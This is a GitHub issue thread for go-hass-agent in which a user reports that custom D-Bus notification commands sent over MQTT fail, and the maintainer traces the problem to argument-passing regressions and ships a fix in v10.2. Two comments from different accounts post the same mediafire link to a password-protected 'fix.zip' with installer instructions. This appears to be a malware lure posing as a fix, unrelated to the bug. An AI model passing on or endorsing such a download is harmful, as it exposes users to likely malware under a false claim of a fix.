### ISSUE TITLE
BUG: D-Bus custom commands not working

### ISSUE THREAD

**Issue by joshuar** [joshuar/go-hass-agent#252]
Hi @joshuar,

Thanks for resolving the issue so quickly. I've reviewed the changes made to the code and I see that the topic has changed when publishing a command to D-Bus. I'm trying to send a notification from HAss, but I'm unable to do so—I get the following error:

```bash
WARN Error dispatching D-Bus command. linux.controller=mqtt controller=dbus_command bus=session destination=org.freedesktop.Notifications path=/org/freedesktop/Notifications method=org.freedesktop.Notifications.Notify error="SessionBus: call could not retrieve object (No such method 'Notify' in interface 'org.freedesktop.Notifications' at object path '/org/freedesktop/Notifications' (signature 'sdsssava{sv}d'))"
```

And this is the JSON message I'm publishing in the `gohassagent/<my-computer-name>/dbuscommand` topic:

```json
{
  "bus": "session",
  "path": "/org/freedesktop/Notifications",
  "method": "org.freedesktop.Notifications.Notify",
  "destination": "org.freedesktop.Notifications",
  "args": [
    "my-app-name",
    0,
    "my-icon",
    "summary",
    "body",
    [],
    {},
    5000
  ],
  "use_session_path": false
}
```

I think it might be that I'm not correctly typing the parameters for the Notify method. It works fine from a D-Bus explorer on my system.

Is it due to my incompetence, or could there be an issue mapping JSON values to Go's native types?

Thanks a lot, and sorry if I went off-topic too much.

_Originally posted by @eleektro in https://github.com/joshuar/go-hass-agent/issues/249#issuecomment-2307081070_

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joshuar** [comment]
Hey @eleektro, 

Firstly thanks for trying out Go Hass Agent!

Now, I believe that the custom D-Bus command code is non-functional right now, some regressions have crept in. For example, the code currently won't pass any arguments you give to the D-Bus method you call. So I think that is likely, at least part of your problem.

I am working on fixing this, it likely won't make it into the next release (v10.1) but in a subsequent patch release (likely 10.1.1). 

In the meantime, if you are looking to send notifications through Go Hass Agent, it should already support it OOTB. The agent exposes a `notify.mobile_app_HOSTNAME` (replace `HOSTNAME` with the short hostname of the device running the agent) service in Home Assistant you can use. For example in *Developer Tools->Services* in Home Assistant:

![image](https://github.com/user-attachments/assets/47d34faf-f182-4a2e-a568-de8ae5a7c7ff)

**Comment by joshuar** [comment]
Hey @eleektro, so I've spent some time looking into this issue. It took  my down a rabbit hold of D-Bus internals and introspection, and I believe I've come out the other side with a fix to this issue. The next version of the agent will have the fix (v10.2).

For background, there is nothing wrong with your inputs or invocation. There **was** a regression in Go Hass Agent whereby specified arguments to a command were not being passed to D-Bus. Fixed. There was also a subtle issue in the way the arguments are converted from what is provided over MQTT to what is needed by D-Bus. Also fixed.

Thank you for reporting this issue, that was a fun one to look into :p

**Comment by joshuar** [comment]
Hey @eleektro, I've just released [v10.2](https://github.com/joshuar/go-hass-agent/releases/tag/v10.2.0) which contains a fix for your problem with the custom D-Bus command feature. For me, your example of sending a notification works, as as should any other D-Bus command you throw in there. Please try it out when you get a chance and report back!

**Comment by joshuar** [comment]
Hey @eleektro, I'm going to close this issue on the assumption that the custom D-Bus commands are now working. For me, using your example creates a notification. Please ensure you try with the latest version and re-open if there are still issues!

**Comment by eleektro** [comment]
Sorry for the delay in replying, I have not received any notification about your answers.

Thanks for your work in solving the problem, I will try it as soon as I can resume the integrations I had in mind to do. Right now I am updating the system and I find that the new version of the go-hass-agent binary is already available for my distro.
